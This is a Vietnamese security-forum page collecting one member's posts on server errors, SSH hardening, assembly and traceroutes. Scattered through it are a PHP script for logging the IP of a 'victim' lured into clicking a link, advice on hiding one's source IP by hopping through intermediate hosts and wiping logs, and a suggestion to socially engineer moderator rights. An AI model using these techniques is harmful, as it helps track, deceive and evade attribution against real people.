banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: sasser01052004  XML
Profile for sasser01052004 Messages posted by sasser01052004 [ number of posts not being displayed on this page: 0 ]
 
nó bị thế này:

Traceback (most recent call last):
File "/usr/bin/yum", line 22, in <module>
import yummain
File "/usr/share/yum/yummain.py", line 22, in <module>
import clientStuff
File "/usr/share/yum/clientStuff.py", line 18, in <module>
import rpm
ImportError: No module named rpm
 


Cái apache thì lại bị thế này:
/etc/init.d/apache2 start
* Starting web server apache2 (98)Address already in use: make_sock: could not bind to address [::]:80
(98)Address already in use: make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
 


Các bạn giúp tớ với
1: Thông tin login của SQL Sever được lưu trong table nào?  


Cái này tuỳ thôi bạn, nếu là MySql thì là information_schema

2: Hãy cho biết thông tin User, role và thông tin user là thành viên của 1 role được lưu vào trong table hệ thống nào? 


Cái này bạn tham khảo vài từ khoá User Privileges for SQL user

brocno wrote:
y của bác alone_guy là hiệu quả nhất.sử dung code mới mong lấy dc ip.chứ con dùng netstat -n bác nào tìm được thì phải là cao thủ!
đây là code để lấy ip của victim,nhưng bạn cần 1 host hỗ trợ php.
<?php
error_reporting(0);

$urlmuonchuyen="liên kết";

$ipsave="layip.txt";

$ip = $_SERVER['REMOTE_ADDR'];

//======= Begin Xem File =======

if (isset($_GET['xem']) && $_GET['xem']=="ok"smilie
{
if(file_exists($ipsave))
{
ob_clean();
flush();
readfile($ipsave);
}
else
{
echo "Chua Co File Log IP.";
}
exit;
}

//======= End Xem File =======

//======= Begin Xoa File =======

if (isset($_GET['xoa']) && $_GET['xoa']=="ok"smilie
{
if(file_exists($ipsave))
{
unlink($ipsave);
}
echo "Xoa Thanh Cong.";
exit;
}

//======= End Xoa File =======

saveip($ipsave,$ip);

function saveip($ipsave,$noidungip)
{
$ipp = fopen($ipsave,"a+"smilie;
fputs($ipp,$noidungip."\r\n"smilie;
fclose($ipp);
}

header("Location: $urlmuonchuyen"smilie;
?>

lưu lai vs tên xxx.php rùi up lên host.trong đó "liên kết"bạn muốn link hướng đến.
công việc còn lại là gửi link cho victim ,dụ victim click vào.
- xem ip của victim : đường dẫn?xem=ok
- xoá : đường dẫn?xoá=ok
Chúc thành công! 


bác này làm lỗi nhiều quá

fixed:

<?php
error_reporting(0);

$urlmuonchuyen="http://teenq12.info/@forum/forum.php";

$ipsave="layip.txt";

$ip = $_SERVER['REMOTE_ADDR'];

//======= Begin Xem File =======

if (isset($_GET['xem']) && $_GET['xem']=="ok"smilie
{
if(file_exists($ipsave))
{
ob_clean();
flush();
readfile($ipsave);
}
else
{
echo "Chua Co File Log IP.";
}
exit;
}

//======= End Xem File =======

//======= Begin Xoa File =======

if (isset($_GET['xoa']) && $_GET['xoa']=="ok"smilie
{
if(file_exists($ipsave))
{
unlink($ipsave);
}
echo "Xoa Thanh Cong.";
exit;
}

//======= End Xoa File =======

saveip($ipsave,$ip);

function saveip($ipsave,$noidungip)
{
$ipp = fopen($ipsave,"a+"smilie;
fputs($ipp,$noidungip."\r\n"smilie;
fclose($ipp);
}

header("Location: $urlmuonchuyen"smilie;
?>  
bạn biết SE (social engineering) của KM chứ, bạn có thể áp dụng vào trường hợp này 1 chút như đăng kí làm mod hay smod của forum này rồi tiện tay xoá bài luôn.

hoặc làm theo cách anh Conmale chỉ cũng đc, nhưng phải quen biết và có lí do chính đáng.

Hoặc đôi khi cũng phải dùng 1 số cách mờ ám, nhưng tớ nghĩ bạn nên làm theo 2 cách trên sẽ tốt hơn
Mới đọc mà đã chán ngán rồi rao ? Vậy thì làm sao tìm hiểu được virus trên Windows được ?
Bản chất ASM cho x86 là như nhau, chỉ khác syntax. Cố gắng học cho tới nơi tới chốn.
Hồi xưa cố lắm, cuối cùng tui còn viết Game cho Win32 = MASM32, dựa trên document OpenGL của NeHe. Cái gì cũng có cái giá của nó, bỏ ra 1 thì nhận 1.
 


CÁi này học lâu rồi anh ơi, học xong mới thấy chán.

Mấy con virus trên windows thì dissassemler nó, xem có cái gì zui ko thôi.

Em đang tìm hiểu về hệ AT&T. ^^

conmale wrote:

gatapchoi wrote:
Anh ơi. C thì em có rồi, nhưng mà ASM thì em không có. Anh có nguồn nào không cho em với, tiếng việt anh nhé, vì tiếng anh em kém lắm. Hi hi, thank anh./. 


Nguồn gì? ASM có tiếng Việt hồi nào? 


Asm cũng có tiếng việt mà anh, trong quyển hợp ngữ và lập trình ứng dụng á.

Em học xong thấy chán ngán mấy cái lập trình trên windows.

Anh có tài liệu nào về lập trình hợp ngữ hệ AT&T trên linux thì chia sẻ với em chút nhé.
hi hi, nhầm lẫn rồi, WH là của chiro chứ.

Tại mình ko biết nên có 1 số lời nói sai vậy.

Chân thành xin lỗi chiro nhé

Nhưng tớ cũng ko nói câu nào về bản thân cả, tớ ko tự đánh giá về mình mà để người khác nhận xét bạn à.

^^.
chiro8x@chiro8x-desktop$telnet www.parse.com 80


Cái này giống của bạn chiro8x việt hoá cái WH2.4 nhỉ

có gì send yahoo pm cái
cứ pri yahoo cho tớ ở private message ấy
Dùng fail2ban hay tất cả các tool theo kiểu scan log rồi đưa ra action đều chiếm dụng memory và cpu cao, đặc biệt là nếu viết script không tốt và file log có kích thước quá lớn chưa được cắt
Theo tôi thì bạn chủ topic nên tìm hiểu kỹ hơn về các service mình triển khai để tối ưu cấu hình. Dovecot thì tôi không rõ nhưng ssh có thể giới hạn số lần thử sai qua tham số MaxAuthTries trong /etc/sshd_config  


hình như bạn ghi đường dẫn sai, tớ nhớ là /etc/ssh/sshd_config chứ nhỉ

bạn nên thay đổi 1 số cái khác như port (port đó chỉ mình bạn biết thôi nhé)
bạn nên đổi port ssh

có gì cứ pm tớ
Hjc, mấy anh việt hoá giùm em cái, viết toàn bằng tiếng anh đọc chút là muốn xỉu
Chào bạn, có thể đâu là thứ bạn cần http://quantrilinux.com/diendan/Thread-NGINX-c%C6%A1-b%E1%BA%A3n



Mà các rule của mod_security của bạn như thế nào thì tớ mới giúp đc

Về việc viết rules bạn nên tham khảo một số bài viết của anh Conmale ở phòng đọc ấy, các bài đó viết rất chi tiết về giới hạn số lượng request

Cứ pm qua nick tớ tớ sẽ giúp bạn

conmale wrote:


sasser01052004 wrote:
Code:

Tracing route to ns2.dnsv5.com [183.60.59.218]
over a maximum of 30 hops:

1 * * * Request timed out.
2 89 ms 69 ms 59 ms 10.204.0.33
3 78 ms 69 ms 60 ms 10.204.0.65
4 78 ms 80 ms 89 ms localhost [27.68.248.29]
5 79 ms 59 ms 59 ms localhost [27.68.248.14]
6 118 ms 119 ms 119 ms 203.131.245.85
7 157 ms 159 ms 219 ms as-0.r21.osakjp01.jp.bb.gin.ntt.net [129.250.2.1
48]
8 299 ms 610 ms 300 ms as-1.r21.snjsca04.us.bb.gin.ntt.net [129.250.3.1
97]
9 289 ms 279 ms 279 ms ae-2.r06.snjsca04.us.bb.gin.ntt.net [129.250.5.5
5]
10 277 ms 290 ms 289 ms xe-0.chinanet.snjsca04.us.bb.gin.ntt.net [129.25
0.8.6]
11 277 ms 290 ms 289 ms 202.97.50.69
12 348 ms 359 ms 369 ms

Tại sao mấy cái 4 và 5 lại chĩa vào địa chỉ loopback của em hả mấy anh.

Viettel dùng "localhost" cho 2 public IP ở trên là vi phạm nghiêm trọng quy định của internic. 


Cám ơn anh Conmale, nhưng quy định của Internic là gì? Anh có thể giải thích cho em chút được không. (Hi hi, tại vì em tra google mà không thấy gì nên hỏi anh chút)
Code:
Tracing route to ns2.dnsv5.com [183.60.59.218]
over a maximum of 30 hops:
1 * * * Request timed out.
2 89 ms 69 ms 59 ms 10.204.0.33
3 78 ms 69 ms 60 ms 10.204.0.65
4 78 ms 80 ms 89 ms localhost [27.68.248.29]
5 79 ms 59 ms 59 ms localhost [27.68.248.14]
6 118 ms 119 ms 119 ms 203.131.245.85
7 157 ms 159 ms 219 ms as-0.r21.osakjp01.jp.bb.gin.ntt.net [129.250.2.1
48]
8 299 ms 610 ms 300 ms as-1.r21.snjsca04.us.bb.gin.ntt.net [129.250.3.1
97]
9 289 ms 279 ms 279 ms ae-2.r06.snjsca04.us.bb.gin.ntt.net [129.250.5.5
5]
10 277 ms 290 ms 289 ms xe-0.chinanet.snjsca04.us.bb.gin.ntt.net [129.25
0.8.6]
11 277 ms 290 ms 289 ms 202.97.50.69
12 348 ms 359 ms 369 ms

Tại sao mấy cái 4 và 5 lại chĩa vào địa chỉ loopback của em hả mấy anh.
Bạn tham khảo cái này thêm:
/hvaonline/posts/list/34712.html
virus đa cấu hình 
Là cái gì vậy mình chưa nghe bao giờ. Bạn sử dụng sai trầm trọng các từ ngữ chuyên môn. Trong file temp.rar này có một con sysanti. Con này nghe nói xuyên được deepfreezer.
Trong trường hợp này, bạn nên sao lưu lại driver (bằng driver max) rồi cài lại windows. Chúc bạn thành công.
Ồ, thuật giải viết bằng heuristic khá là đơn giản, nhanh nhưng cũng có những rủi ro.
Tưởng mấy đại ca như AVIRA không dám dùng giải thuật này nữa chứ.
HEUR/Exploit.HTML is a heuristic detection routine designed to detect common malware scripts in HTML files. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing.
 

cái này được viết bằng thuật giải heuristic à. Viết toàn bằng tiếng anh khó hiểu quá.
Hì hì, chẳng lẽ anh phải trình bày chi tiết sao em? Nguyên tắc là thế này:

- Như em biết, trong một mạng (LAN, WAN, Internet...) để truy cập từ điểm này sang điểm khác em phải có điểm xuất phát và điểm đích. Trong trường hợp TCP/IP, em phải có source IP (máy em) và destination IP (mục tiêu). Hầu hết các hệ thống ngày nay đều có một (hoặc nhiều) cơ chế ghi nhận các truy cập. Bởi vậy, để các cơ chế không ghi nhận source IP (thật của mình) thì cần phải dàn dựng làm sao đó để các cơ chế đó ghi nhận source IP là một IP nào khác. Giả sứ đi mình là A, muốn truy cập đến đích là B và muốn che giấu A thì từ A phải nhảy sang X, Y, Z.... để cho cơ chế ghi nhận kia lưu trữ thông tin Z chớ không lưu trữ thông tin A.

- Dàn dựng ra làm sao còn tuỳ thuộc vào mục tiêu là gì nữa. Ví dụ mục tiêu là trang web và muốn tấn công thuần tuý trên web thì có thể dựa hoàn toàn trên cơ chế proxy hoặc bất cứ cái gì hiểu và làm việc được với HTTP. Nếu mục tiêu là cái gì khác nữa thì phải tìm ra những cơ chế tương thích để "nhảy" từ điểm này sang điểm kia. Điều quan trọng là quá trình dàn dựng sao cho hợp lý và làm sao để việc trace ngược lại Z, Y, X... đến A khó khăn.

- Dấu vết ở mỗi chặng đều có (ví dụ đi từ đâu đến, lúc nào, làm những gì....) và tuỳ mỗi cơ chế, mỗi ấn định mà những thông tin ấy được ghi nhận nhiều hay ít. Bởi vậy, không những phải nắm mục tiêu mình thâm nhập mà còn phải nắm vững "chặng" mình dùng để "nhảy" để từ đó có thể xoá tối đa những dấu vết do mình tạo ra (ví dụ như trong logs, history, events.....).


Nguyên tắc là vậy, áp dụng ra làm sao còn tuỳ thuộc vào... khả năng sáng tạo và kiến thức của từng người. 

Hi hi, anh comale vẽ đuờng cho hươu chạy kìa. Lỡ hươu chạy thiệt thì chết.smilie
Hình như diễn đàn hva vô hiệu hoá links rồi phải không anh. Cho em hỏi ngoài lề chút là tại sao lại phải vô hiệu hoá các link hả anh. Nếu đã vô hiệu hoá links rồi thì sao không vô hiệu hoá luôn cái "mail to:" luôn đi hả anh.
Có vẻ như Nhân Hoà có config kém lắm. Chuyển sang P.A mà dùng.
Billing Contact Name: YahooDomains BillingContact
Billing Contact Organization: Yahoo! Inc
Billing Contact Address1: 701 First Ave.
Billing Contact City: Sunnyvale
Billing Contact State/Province: CA
Billing Contact Postal Code: 94089
Billing Contact Country: United States
Billing Contact Country Code: US
Billing Contact Phone Number: +1.4089162124
Billing Contact Email: domain.billing@yahoo-inc.com
 


Yahoo mà thấy cái này là bỏ tù luôn phải không anh conmale
Em xin minh hoạ 1 ví dụ:

Khi 1 NCC Hosting tạo ra 1 user. user sẽ có các folder như là public_html...

Khi User họ up forum họ lên thì sẽ có thêm nhiều folder như là admincp,modcp,..... và các file config.php, index.php

Thường thì các user bị hack rồi lúc đó họ mới chống! nên bây giờ có các nào để auto CHMOD cho các folder là 711 và file là 644 hay không ? Như vậy sẽ chặn đc local attack 1 phần nào đó. 


Cái này là phân quyền access chứ không giúp gì cho phòng thủ cả bạn ơi .
Bạn có thể nói cụ thể hơn không ?
Chào anh conmale !
Anh có thể cho em một vài ví dụ cụ thể hơn về các giải pháp bảo mật cho cá nhân , doanh nghiệp và chính phủ điện tử đuợc ko ?
Tại sao anh nói các giải pháp được đặt ra chỉ mang tính nhất thời .
Trong năm trước, dạng tấn côn social engineering sẽ có mặt khá đầy đủ ở các phương diện tấn công. Năm nay ,hi vọng sẽ không ai bị lừa bằng thủ đoạn này.
Trong số những người post những bài kỹ thuật đó có rất nghiều người trình độ cũng thuộc dạng ù mờ thậm chí là đọc ở đâu đấy rồi thấy ok 1 tí là copy xáo nấu một tí rồi quăng lên, mục đích chia sẻ thì ít còn khoe hàng thì nhiều. Đối với những người như thế thì rất cần được dẵm phải những cái gai như lão tmd đây  


Điển hình là Than choc đó .
Bạn có thể cho thông tin thêm được không, có đầy đủ thông tin thì tui mới giúp bạn được.
Có 1..1000 cách làm botnets, bạn muốn tui chỉ cách nào? Mà bạn tìm hiểu botnets làm gì vậy? Tạo một attacking network không dễ đâu .
Mà bạn lấy UNIKEY từ nguồn nào vậy ?
 
Go to Page:  First Page Page 1 2 3 4

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|